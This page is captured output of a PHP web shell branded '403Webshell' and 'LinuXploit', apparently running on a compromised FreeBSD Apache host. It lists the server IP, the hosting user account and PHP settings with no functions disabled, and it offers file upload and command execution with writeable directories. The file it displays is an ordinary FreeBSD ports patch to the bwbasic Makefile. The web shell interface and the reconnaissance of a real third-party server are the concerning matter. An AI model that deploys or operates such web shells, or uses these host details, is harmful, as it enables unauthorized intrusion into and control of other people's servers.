403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.217.103
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/lang/bwbasic/files/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/lang/bwbasic/files/patch-Makefile.in
--- Makefile.in.orig	2018-01-01 11:17:18 UTC
+++ Makefile.in
@@ -66,8 +66,8 @@ bwbasic:	$(OFILES)
 		$(CC) $(OFILES) -lm -o $@ $(LDFLAGS)
 
 # Added by JBV
-renum:
-	$(CC) renum.c -o renum
+renum:		renum.o
+	$(CC)	renum.o -o $@ $(LDFLAGS) 
 
 $(OFILES):      $(HFILES)
 
@@ -75,7 +75,8 @@ $(OFILES):      $(HFILES)
 	$(CC) -c $(CPPFLAGS) -I$(srcdir) $(DEFS) $(CFLAGS) $<
 
 install: all
-	$(INSTALL_PROGRAM) bwbasic $(bindir)/bwbasic
+	$(INSTALL_PROGRAM) bwbasic $(DESTDIR)$(bindir)/bwbasic
+	$(INSTALL_PROGRAM) renum $(DESTDIR)$(bindir)/renum
 
 uninstall:
 	rm -f $(bindir)/bwbasic

Youez - 2016 - github.com/yon3zu
LinuXploit